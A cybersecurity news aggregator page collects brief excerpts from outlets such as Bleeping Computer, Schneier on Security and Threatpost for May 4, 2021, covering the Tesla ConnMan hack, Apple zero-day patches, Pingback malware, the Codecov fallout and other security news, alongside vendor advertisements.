Schneier on Security
MAY 4, 2021
This is an impressive hack: Security researchers Ralf-Philipp Weinmann of Kunnamon, Inc. and Benedikt Schmotzle of Comsecuris GmbH have found remote zero-click security vulnerabilities in an open-source software component (ConnMan) used in Tesla automobiles that allowed them to compromise parked cars and control their infotainment systems over WiFi.
Tech Republic Security
MAY 4, 2021
Microsoft Research's Project Freta aims to find invisible malware running on the cloud.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.
Security Boulevard
MAY 4, 2021
Tens of billions of dollars each year are spent on cybersecurity, yet cybercriminals continue to succeed. There seems to be a never-ending stream of cybersecurity bad news. Companies constantly experience negative security events – Facebook, Verkada, and Elekta are recent examples. Cybersecurity failures become public relations, customer relations, and financial problems for companies.
Hot for Security
MAY 4, 2021
Apple this week issued out-of-band updates for mobile customers to patch two zero-day vulnerabilities that let attackers execute remote code on their iDevices. The Cupertino-based tech giant says criminals “may” have already exploited the flaws. Available for most iDevices in circulation, iOS 14.5.1 (and the complementary iPadOS 14.5.1) fixes a critical memory corruption issue in the Safari WebKit engine where “processing maliciously crafted web content may lead to arbitrary code execution,” acc
Advertisement
How many people would you trust with your house keys? Chances are, you have a handful of trusted friends and family members who have an emergency copy, but you definitely wouldn’t hand those out too freely. You have stuff that’s worth protecting—and the more people that have access to your belongings, the higher the odds that something will go missing.
Security Boulevard
MAY 4, 2021
The only constant is change. The ongoing effects of COVID-19 have taught us that change is inevitable to survive. One major area that has been affected during COVID-19 is how we interact with employees, and what we need those employees to know right now. Cybersecurity is one of those critical areas of this new world. The post The New Wave of Cybersecurity Awareness Training appeared first on Security Boulevard.
Webroot
MAY 4, 2021
Typically, when cryptocurrency values change, one would expect to see changes in crypto-related cybercrime. In particular, trends in Bitcoin values tend to be the bellwether you can use to predict how other currencies’ values will shift, and there are usually corresponding shifts in crypto-based crime, such as ransomware, though it’s not necessarily the kind of change you might predict.
Cyber Security Informer brings together the best content for cyber security professionals from the widest variety of industry thought leaders.
Google Security
MAY 4, 2021
Alex Gough, Engineer, Chrome Platform Security Team Chrome 90 for Windows adopts Hardware-enforced Stack Protection, a mitigation technology to make the exploitation of security bugs more difficult for attackers. This is supported by Windows 20H1 (December Update) or later, running on processors with Control-flow Enforcement Technology (CET) such as Intel 11th Gen or AMD Zen 3 CPUs.
Tech Republic Security
MAY 4, 2021
Facebook says it wants to make E2EE the default across all of its messaging platforms, but this will be a gradual process.
We Live Security
MAY 4, 2021
The Patch Tuesday security update due in July should hammer the last nail in the coffin of Adobe Flash Player. The post Microsoft will soon remove Flash Player from Windows 10 devices appeared first on WeLiveSecurity.
Bleeping Computer
MAY 4, 2021
A driver that's been pushed for the past 12 years to Dell computer devices for consumers and enterprises contains multiple vulnerabilities that could lead to increased privileges on the system. [.].
Advertiser: Revenera
In a recent study, IDC found that 64% of organizations said they were already using open source in software development with a further 25% planning to in the next year. Most organizations are unaware of just how much open-source code is used and underestimate their dependency on it. As enterprises grow the use of open-source software, they face a new challenge: understanding the scope of open-source software that's being used throughout the organization and the corresponding exposure.
Graham Cluley
MAY 4, 2021
Police have shut down one Boystown, ome of the world's largest child abuse image websites, following an investigation that saw authorities across the globe work together to identify and apprehend those responsible for its creation and maintenance.
Bleeping Computer
MAY 4, 2021
A global-scale phishing campaign targeted worldwide organizations across a large array of industries with never-before-seen malware strains delivered via specially-tailored lures. [.].
CSO Magazine
MAY 4, 2021
The CSO50 awards recognize security projects that demonstrate outstanding thought leadership and business value. The awards are scored according to a uniform set of criteria by a panel of judges that includes security leaders, industry experts, and academics. It is an opportunity for security leaders to share with their peers the risk and security innovations that led the way to greater success for their organizations.
CyberSecurity Insiders
MAY 4, 2021
Electric Car’s tycoon Elon Musk has announced that any hacker in the world can never hack his Starlink Satellite Internet Service….hmmm atleast with the currently available technological tools. Musk shared the news on Twitter and added that its SpaceX project of offering internet services through satellite will apparently be available from this year end- provided all goes well with the R&D team.
Advertisement
Within the past few years, ransomware attacks have turned to critical infrastructure, healthcare, and government entities. Attackers have taken advantage of the rapid shift to remote work and new technologies. Add to that hacktivism due to global conflicts and U.S. elections, and an increased focus on AI, and you have the perfect recipe for a knotty and turbulent 2024.
Security Boulevard
MAY 4, 2021
After Experian fixed a weakness at a partner website that let anyone view credit scores for nearly every American by just inputting a name and address, questions remain about whether the same problem exists with other partners, and how widespread the problem might be. A security researcher and college student, Bill Demirkapi, stumbled across the. The post Experian API Leaked Credit Scores appeared first on Security Boulevard.
CSO Magazine
MAY 4, 2021
The role of the CISO is relatively immature in comparison to other, longer standing C-level business positions such as CEO, COO, or CFO, but it has evolved significantly in just the last few years alone. Today’s CISOs are required to be somewhat different from the traditional security leaders of the past, and that is reflective of two things: the vital and growing role data plays in the everyday running of a business and increased expectations of the security function to keep that data safe and
Bleeping Computer
MAY 4, 2021
Today, Trustwave researchers have disclosed their findings on a novel Windows malware sample that uses Internet Control Message Protocol (ICMP) for its command-and-control (C2) activities. Dubbed "Pingback," this malware targets Windows 64-bit systems, and uses DLL Hijacking to gain persistence. [.].
Tech Republic Security
MAY 4, 2021
The problem is not the cloud, one expert said. It's the speed at which companies are moving items to the cloud without considering security controls.
Advertisement
The healthcare industry has massively adopted web tracking tools, including pixels and trackers. Tracking tools on user-authenticated and unauthenticated web pages can access personal health information (PHI) such as IP addresses, medical record numbers, home and email addresses, appointment dates, or other info provided by users on pages and thus can violate HIPAA Rules that govern the Use of Online Tracking Technologies by HIPAA Covered Entities and Business Associates.
CSO Magazine
MAY 4, 2021
The days of perimeter security acting as the core of cybersecurity defenses are long gone. No organization would be caught without firewalls and antivirus scanners to catch low-sophistication attacks, but the real battle to protect the network has moved to the realm of identity and access management (IAM). [ 5 steps to simple role-based access control (RBAC) | Sign up for CSO newsletters !
Security Affairs
MAY 4, 2021
A massive distributed denial of service (DDoS) attack shut down Belgiums’ government websites, internal networks were also impacted. A massive distributed denial of service (DDoS) attack hit most of the Belgium government ’s IT network, according to the media the attack also knocked offline internal systems. People attempting to visit websites hosted on the Belnet network were not able to reach them and were displayed error messages.
WIRED Threat Level
MAY 4, 2021
A family-run psychotherapy startup grew into a health care giant. It was a huge success—until the data breach and the anonymous ransom notes sent to clients.
Bleeping Computer
MAY 4, 2021
Cloud communications company Twilio has now disclosed that the recent Codecov supply-chain attack exposed a small number of Twilio's customer email addresses. [.].
Advertisement
The losses companies suffered in 2023 ransomware attacks increased by 74% compared to those of the previous year, according to new data from the Federal Bureau of Investigation (FBI). The true figure is likely to be even higher, though, as many identity theft and phishing attacks go unreported. Ransomware attackers can potentially paralyze not just private sector organizations but also healthcare facilities, schools, and entire police departments.
SC Magazine
MAY 4, 2021
Infosec’s Choose Your Own Adventure training game “Deep Space Danger” tests employees on their knowledge of social engineering. The employees at your organization are badly in need of security awareness training. What do you do? A. Bore them with dull content that feels like a lecture. B. Engage them with gamified, interactive lessons. “B” is obviously the correct choice, but not all companies succeed in motivating their workers to learn the ins and outs of phishing
Hot for Security
MAY 4, 2021
The latest revised draft of Australia’s primary school curriculum proposes to teach students about cybersecurity from the age of five. The newly proposed curriculum for children aged five to 16 includes a new strand indicating a new discipline “Considering privacy and security” that “involves students developing appropriate techniques for managing data, which is personal, and effectively implementing security protocols.”.
Tech Republic Security
MAY 4, 2021
Companies are accelerating their use of the cloud, but should slow down and make sure security is built in from the beginning.
Bleeping Computer
MAY 4, 2021
The U.S. Agency for Global Media (USAGM) has disclosed a data breach that exposed the personal information of current and former employees and their beneficiaries. [.].
Speaker: Blackberry, OSS Consultants, & Revenera
Software is complex, which makes threats to the software supply chain more real every day. 64% of organizations have been impacted by a software supply chain attack and 60% of data breaches are due to unpatched software vulnerabilities. In the U.S. alone, cyber losses totaled $10.3 billion in 2022. All of these stats beg the question, “Do you know what’s in your software?
Malwarebytes
MAY 4, 2021
Spectre is the name for a whole class of vulnerabilities discovered in January 2018 that affected huge numbers of modern computer processors that rely on a performance feature called speculative execution. Since then, some of the world’s most talented computer scientists from industry and academia have worked on software patches and hardware defenses.
Bleeping Computer
MAY 4, 2021
US Department of Defense (DOD) officials today announced that the department's Vulnerability Disclosure Program (VDP) has been expanded to include all publicly accessible DOD websites and applications. [.].
Threatpost
MAY 4, 2021
The never-seen malware strains have "professionally coded sophistication" and were launched by a well-resourced APT using nearly 50 domains, one hijacked.
Bleeping Computer
MAY 4, 2021
Google Chrome now hinders attackers' efforts to exploit security bugs on systems with Intel 11th Gen or AMD Zen 3 CPUs, running Windows 10 2004 or later. [.].
Speaker: Erika R. Bales, Esq.
When we talk about “compliance and security," most companies want to ensure that steps are being taken to protect what they value most – people, data, real or personal property, intellectual property, digital assets, or any other number of other things - and it’s more important than ever that safeguards are in place. Let’s step back and focus on the idea that no matter how complicated the compliance and security regime, it should be able to be distilled down to a checklist.
Expert insights. Personalized for you.
344 
Let's personalize your content